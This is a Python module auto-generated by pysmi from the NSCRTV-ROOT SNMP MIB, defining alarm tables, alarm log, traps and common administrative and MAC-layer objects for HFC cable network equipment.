# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NSCRTV-ROOT
# Produced by pysmi-0.3.4 at Wed May 1 14:25:05 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "SingleValueConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Counter64, Counter32, IpAddress, iso, Gauge32, ObjectIdentity, Bits, Unsigned32, ModuleIdentity, MibIdentifier, TimeTicks, NotificationType, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Counter32", "IpAddress", "iso", "Gauge32", "ObjectIdentity", "Bits", "Unsigned32", "ModuleIdentity", "MibIdentifier", "TimeTicks", "NotificationType", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
nscrtvRoot = MibIdentifier((1, 3, 6, 1, 4, 1, 17409))
nscrtvHFCemsTree = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1))
propertyIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 1))
alarmsIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 2))
commonIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3))
oaIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 11))
analogPropertyTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1), )
if mibBuilder.loadTexts: analogPropertyTable.setStatus('mandatory')
if mibBuilder.loadTexts: analogPropertyTable.setDescription('Attribute table of analog parameters.')
analogPropertyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1), ).setIndexNames((0, "NSCRTV-ROOT", "analogParameterOID"))
if mibBuilder.loadTexts: analogPropertyEntry.setStatus('mandatory')
if mibBuilder.loadTexts: analogPropertyEntry.setDescription("Head row of the analog-parameter attribute table. The parameter OID serves as the table index; it is encoded as 'length + OID', where the OID's first two members '1.3' are encoded as '1' and '3' respectively, instead of the ordinary OID encoding (0x2B).")
analogParameterOID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 1), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: analogParameterOID.setStatus('mandatory')
if mibBuilder.loadTexts: analogParameterOID.setDescription('index')
alarmEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alarmEnable.setStatus('mandatory')
if mibBuilder.loadTexts: alarmEnable.setDescription("Alarm enable control byte; a bit set to '1' enables the corresponding alarm, '0' disables it. Bit 0: alarm enable low. Bit 1: alarm enable low. Bit 2: alarm enable high. Bit 3: alarm enable high. Bits 4~7 are reserved and should be 0. This object should be stored in non-volatile memory.")
analogAlarmState = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("aasNominal", 1), ("aasHIHI", 2), ("aasHI", 3), ("aasLO", 4), ("aasLOLO", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: analogAlarmState.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmState.setDescription('The parameters of the current state of alarm.')
analogAlarmHIHI = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmHIHI.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmHIHI.setDescription('Alarm HIHI high threshold value. This object should be stored in non-volatile memory.')
analogAlarmHI = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 5), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmHI.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmHI.setDescription('HI high alarm threshold value. This object should be stored in non-volatile memory.')
analogAlarmLO = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 6), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmLO.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmLO.setDescription('LO low alarm threshold value. This object should be stored in non-volatile memory.')
analogAlarmLOLO = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 7), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmLOLO.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmLOLO.setDescription('Alarm LOLO very low threshold value. This object should be stored in non-volatile memory.')
analogAlarmDeadband = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 8), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: analogAlarmDeadband.setStatus('mandatory')
if mibBuilder.loadTexts: analogAlarmDeadband.setDescription('Alarm deadband threshold. After an alarm, the alarm can only be cleared once the absolute difference between the parameter value and the alarm threshold exceeds this deadband value. This object should be stored in non-volatile memory.')
discretePropertyTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2), )
if mibBuilder.loadTexts: discretePropertyTable.setStatus('mandatory')
if mibBuilder.loadTexts: discretePropertyTable.setDescription('Discrete Attribute Table.')
discretePropertyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1), ).setIndexNames((0, "NSCRTV-ROOT", "discreteParameterOID"), (0, "NSCRTV-ROOT", "discreteAlarmValue"))
if mibBuilder.loadTexts: discretePropertyEntry.setStatus('mandatory')
if mibBuilder.loadTexts: discretePropertyEntry.setDescription('Head row of the discrete attribute table. The OID is encoded in the same way as in the analog attribute table.')
discreteParameterOID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1, 1), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: discreteParameterOID.setStatus('mandatory')
if mibBuilder.loadTexts: discreteParameterOID.setDescription('Attribute Table discrete index 1: Parameters OID.')
discreteAlarmValue = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: discreteAlarmValue.setStatus('mandatory')
if mibBuilder.loadTexts: discreteAlarmValue.setDescription('Index 2 of the discrete attribute table: the parameter value. When the parameter of the equipment reaches this value, it is handled as an alarm.')
discreteAlarmEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("disable", 1), ("enableMajor", 2), ("enableMinor", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: discreteAlarmEnable.setStatus('mandatory')
if mibBuilder.loadTexts: discreteAlarmEnable.setDescription('When the alarm enable is set to enableMajor (2) or enableMinor (3), alarm processing is performed for this parameter. When it is set to disable (1), no alarm processing is carried out. The default value of this object is disable (1). This object should be stored in non-volatile memory.')
discreteAlarmState = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 6, 7))).clone(namedValues=NamedValues(("dasNominal", 1), ("dasDiscreteMajor", 6), ("dasDiscreteMinor", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: discreteAlarmState.setStatus('mandatory')
if mibBuilder.loadTexts: discreteAlarmState.setDescription('The parameters of the current state of alarm.')
currentAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3), )
if mibBuilder.loadTexts: currentAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmTable.setDescription('Table of current alarms.')
currentAlarmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3, 1), ).setIndexNames((0, "NSCRTV-ROOT", "currentAlarmOID"))
if mibBuilder.loadTexts: currentAlarmEntry.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmEntry.setDescription('Head row of the current alarm table. The OID is encoded in the same way as in the analog attribute table.')
currentAlarmOID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3, 1, 1), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentAlarmOID.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmOID.setDescription('Index: the OID of an NE parameter currently in an alarm state, corresponding to the parameter OID in the attribute tables.')
currentAlarmState = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("caasHIHI", 2), ("caasHI", 3), ("caasLO", 4), ("caasLOLO", 5), ("caasDiscreteMajor", 6), ("caasDiscreteMinor", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentAlarmState.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmState.setDescription('Warning parameters of the current state of alarm.')
currentAlarmValue = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 3, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: currentAlarmValue.setStatus('mandatory')
if mibBuilder.loadTexts: currentAlarmValue.setDescription("Alarm parameter's value.")
alarmLogNumberOfEntries = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 2, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmLogNumberOfEntries.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogNumberOfEntries.setDescription('Number of records in the alarm log table.')
alarmLogLastIndex = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 2, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmLogLastIndex.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogLastIndex.setDescription('Index of the most recent alarm record.')
alarmLogTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 2, 3), )
if mibBuilder.loadTexts: alarmLogTable.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogTable.setDescription('Alarm log table, supporting at least 16 records. Each time a new record is registered in the table, the management agent (transponder) should send a trap to the manager.')
alarmLogEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 2, 3, 1), ).setIndexNames((0, "NSCRTV-ROOT", "alarmLogIndex"))
if mibBuilder.loadTexts: alarmLogEntry.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogEntry.setDescription('Head row of the alarm log table.')
alarmLogIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 2, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 32767))).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmLogIndex.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogIndex.setDescription('Alarm index uniquely identifying a record in the table. The index starts at 1 and increases by 1 for each new record up to 32767, after which it restarts at 1. Depending on its storage capacity, the management agent may choose which records to delete; the specific details are not specified here.')
alarmLogInformation = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 2, 3, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(17, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmLogInformation.setStatus('mandatory')
if mibBuilder.loadTexts: alarmLogInformation.setDescription('Alarm record information, a multi-byte string, defined as follows: Bytes 1~4: alarm time (POSIX format, most significant byte first). Byte 5: alarm type (enumeration, defined below). Byte 6: commonNEStatus value after the alarm. Bytes 7~m: object identifier of the alarm parameter (ASN.1 Basic Encoding Rules). Bytes n~z: value of the alarm parameter (ASN.1 Basic Encoding Rules). Alarm type enumeration: 1 NOMINAL, 2 HIHI, 3 HI, 4 LO, 5 LOLO, 6 Discrete Major, 7 Discrete Minor.')
alarmText = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 2, 4), DisplayString())
if mibBuilder.loadTexts: alarmText.setStatus('optional')
if mibBuilder.loadTexts: alarmText.setDescription('This object provides, for traps that need it, a text field whose content is defined by the transponder. The content depends on the definition of the alarm parameter and is therefore indeterminate; this object is specified as not accessible.')
hfcAlarmEvent = NotificationType((1, 3, 6, 1, 4, 1, 17409, 1) + (0,1)).setObjects(("NSCRTV-ROOT", "commonPhysAddress"), ("NSCRTV-ROOT", "commonNELogicalID"), ("NSCRTV-ROOT", "alarmLogInformation"), ("NSCRTV-ROOT", "alarmText"))
if mibBuilder.loadTexts: hfcAlarmEvent.setDescription('This trap is sent when an alarm event is detected. Whether the alarmText variable is bound depends on the alarmed object; some parameters only need the first three variables bound.')
commonAdminGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1))
commonAdminUseRf = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2))
commonAdminUseEthernet = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3))
commonMACGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1))
commonRfGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2))
commonMacAddress = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1))
commonBackoffParams = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2))
commonMacStats = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3))
commonAgentGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1))
commonDeviceGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2))
commonNELogicalID = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 40))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonNELogicalID.setStatus('mandatory')
if mibBuilder.loadTexts: commonNELogicalID.setDescription('The logical identifier (LogicID) assigned to the NE; its value is unrelated to other attributes of the NE. This value should be stored in non-volatile memory.')
commonNEVendor = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNEVendor.setStatus('mandatory')
if mibBuilder.loadTexts: commonNEVendor.setDescription('NE equipment manufacturers.')
commonNEModelNumber = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNEModelNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonNEModelNumber.setDescription('NE equipment models.')
commonNESerialNumber = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNESerialNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonNESerialNumber.setDescription('NE equipment serial numbers.')
commonNEVendorInfo = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNEVendorInfo.setStatus('optional')
if mibBuilder.loadTexts: commonNEVendorInfo.setDescription('NE equipment suppliers other special designated information.')
commonNEStatus = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNEStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonNEStatus.setDescription('Corresponds to the Status parameter in the STATRESP PDU of 7.5.4. Bit 0: CHNLRQST. Bit 1: CNTNRM. Bit 2: CNTCUR. Bit 3: MAJOR ALARMS. Bit 4: MINOR ALARMS. Bit 5: RSVD1. Bit 6: RSVD2. Bit 7: RSVD3.')
commonReset = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("reset", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonReset.setStatus('mandatory')
if mibBuilder.loadTexts: commonReset.setDescription("Writing '1' resets the NE equipment; any other value has no effect. Reading this object returns '1' and has no effect on the equipment.")
commonAlarmDetectionControl = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("detectionDisabled", 1), ("detectionEnabled", 2), ("detectionEnabledAndRegenerate", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAlarmDetectionControl.setStatus('mandatory')
if mibBuilder.loadTexts: commonAlarmDetectionControl.setDescription('This object used to control the Alarm Detection NE.')
commonNetworkAddress = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 9), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonNetworkAddress.setStatus('mandatory')
if mibBuilder.loadTexts: commonNetworkAddress.setDescription('NE network IP address, NE produce Trap should include this address. This value should be stored in nonvolatile memory. This value can be registered through the MAC order or through local vendors to set up Interface.')
commonCheckCode = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 10), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonCheckCode.setStatus('mandatory')
if mibBuilder.loadTexts: commonCheckCode.setDescription('Check code of the transponder configuration report. The check code is computed over the physical configuration of the transponder (including managed equipment) and all parameters stored in non-volatile memory; the algorithm is defined by the vendor. The value of this object should be kept in non-volatile memory. When the transponder is activated, the check code is recalculated and compared with the previously stored value to determine whether hfcColdStart or hfcWarmStart traps should be generated. When this object is written (SetRequest), the check code is recalculated and filled into the GetResponse answering the SetRequest; in that case no hfcColdStart or hfcWarmStart trap is produced.')
commonTrapCommunityString = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 11), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonTrapCommunityString.setStatus('mandatory')
if mibBuilder.loadTexts: commonTrapCommunityString.setDescription("Defines the trap community string. The default value is 'public'. The value of this object should be stored in non-volatile memory.")
commonTamperStatus = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("intact", 1), ("compromised", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonTamperStatus.setStatus('optional')
if mibBuilder.loadTexts: commonTamperStatus.setDescription('Reports the state of the tamper switch of the NE equipment (for example, whether the lid has been opened); this object requires a corresponding entry in the discrete attribute table. intact means normal; compromised indicates an alarm.')
commonInternalTemperature = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-128, 127))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonInternalTemperature.setStatus('optional')
if mibBuilder.loadTexts: commonInternalTemperature.setDescription('Internal (chassis) temperature of the NE equipment, in degrees Celsius. This object requires a corresponding entry in the attribute table.')
commonTime = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 14), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonTime.setStatus('optional')
if mibBuilder.loadTexts: commonTime.setDescription('NE of the POSIX said that the current time (since at 0:00 on January 1, 1970 since the seconds).')
commonVarBindings = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonVarBindings.setStatus('mandatory')
if mibBuilder.loadTexts: commonVarBindings.setDescription('The maximum number of variable bindings the NE can accept in a received SNMP message. A value of 0 indicates no restriction on the maximum number of bindings.')
commonResetCause = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 16), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("powerup", 2), ("command", 3), ("watchdog", 4), ("craft", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonResetCause.setStatus('mandatory')
if mibBuilder.loadTexts: commonResetCause.setDescription('NE said the reasons for the recent reduction.')
commonCraftStatus = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 17), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("disconnected", 1), ("connected", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonCraftStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonCraftStatus.setDescription('The state of the local (craft) interface of the NE (such as an RS232 or RS485 interface). An NE does not necessarily support a local interface. The state of the local interface does not affect the functions of the MAC interface; if the local interface is not supported, the value is disconnected.')
commonDeviceOID = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 18), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceOID.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceOID.setDescription('This OID object as a pointer, the equipment was used at MIB (such as Node, two-way amplifier, etc).')
commonDeviceId = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(32, 32)).setFixedLength(32)).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceId.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceId.setDescription('The contents of this object by the designated by the equipment vendors, manufacturers and products it contains special ASCII text messages.')
commondownload = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 1, 20), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("reset", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commondownload.setStatus('mandatory')
if mibBuilder.loadTexts: commondownload.setDescription('')
commonPhysAddress = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 1), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonPhysAddress.setStatus('mandatory')
if mibBuilder.loadTexts: commonPhysAddress.setDescription('NE MAC (physical) address.')
commonMaxMulticastAddresses = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(4, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonMaxMulticastAddresses.setStatus('mandatory')
if mibBuilder.loadTexts: commonMaxMulticastAddresses.setDescription('NE equipment to support the greatest number of multicast addresses.')
commonMulticastAddressTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 3), )
if mibBuilder.loadTexts: commonMulticastAddressTable.setStatus('mandatory')
if mibBuilder.loadTexts: commonMulticastAddressTable.setDescription('Multicast addresses Table, the value of this object should be stored in nonvolatile memory.')
commonMulticastAddressEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 3, 1), ).setIndexNames((0, "NSCRTV-ROOT", "commonMulticastAddressIndex"))
if mibBuilder.loadTexts: commonMulticastAddressEntry.setStatus('mandatory')
if mibBuilder.loadTexts: commonMulticastAddressEntry.setDescription('Multicast addresses Table Head.')
commonMulticastAddressIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonMulticastAddressIndex.setStatus('mandatory')
if mibBuilder.loadTexts: commonMulticastAddressIndex.setDescription('Multicast addresses Index.')
commonMulticastAddressNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 1, 3, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(6, 6)).setFixedLength(6)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonMulticastAddressNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonMulticastAddressNumber.setDescription('Multicast addresses,I/Gbit')
commonBackoffPeriod = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16383))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonBackoffPeriod.setStatus('mandatory')
if mibBuilder.loadTexts: commonBackoffPeriod.setDescription('Backoff algorithm benchmark time (ms), initialize the default value of 6 ms. The value of this object should be stored in non-volatile memory.')
commonACKTimeoutWindow = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonACKTimeoutWindow.setStatus('mandatory')
if mibBuilder.loadTexts: commonACKTimeoutWindow.setDescription('NE awaiting HE overtime to send ACK response time (ms), initialize the default value is 19 ms. The value of this object should be stored in non-volatile memory.')
commonMaximumMACLayerRetries = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonMaximumMACLayerRetries.setStatus('mandatory')
if mibBuilder.loadTexts: commonMaximumMACLayerRetries.setDescription('NE data packets sent the greatest number of re-examination. Initialize the default value is 16. The value of this object should be stored in non-volatile memory.')
commonMaxPayloadSize = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonMaxPayloadSize.setStatus('mandatory')
if mibBuilder.loadTexts: commonMaxPayloadSize.setDescription('Maximum payload length supported by downstream and upstream channel packets.')
commonBackoffMinimumExponent = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonBackoffMinimumExponent.setStatus('mandatory')
if mibBuilder.loadTexts: commonBackoffMinimumExponent.setDescription('Minimum backoff exponent defined by the MAC layer specification; the default value is 6. This value must not exceed commonBackoffMaximumExponent. The value of this object should be stored in non-volatile memory.')
commonBackoffMaximumExponent = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 2, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonBackoffMaximumExponent.setStatus('mandatory')
if mibBuilder.loadTexts: commonBackoffMaximumExponent.setDescription('Maximum backoff exponent defined by the MAC layer specification; the default value is 15. This value shall not be less than commonBackoffMinimumExponent. The value of this object should be stored in non-volatile memory.')
commonForwardPathLOSEvents = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 1), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonForwardPathLOSEvents.setStatus('optional')
if mibBuilder.loadTexts: commonForwardPathLOSEvents.setDescription('Number of LOS events on the downstream channel; writing resets the counter to 0.')
commonForwardPathFramingErrors = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 2), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonForwardPathFramingErrors.setStatus('optional')
if mibBuilder.loadTexts: commonForwardPathFramingErrors.setDescription('Number of framing errors on the downstream channel; writing resets the counter to 0.')
commonForwardPathCRCErrors = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 3), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonForwardPathCRCErrors.setStatus('optional')
if mibBuilder.loadTexts: commonForwardPathCRCErrors.setDescription('Number of CRC errors on the downstream channel; writing resets the counter to 0.')
commonInvalidMacCmds = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 4), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonInvalidMacCmds.setStatus('optional')
if mibBuilder.loadTexts: commonInvalidMacCmds.setDescription('Number of invalid MAC layer commands received; writing resets the counter to 0.')
commonBackwardPathCollisionTimes = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 1, 3, 5), Counter32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonBackwardPathCollisionTimes.setStatus('optional')
if mibBuilder.loadTexts: commonBackwardPathCollisionTimes.setDescription('Number of packet collisions on the upstream channel; writing resets the counter to 0.')
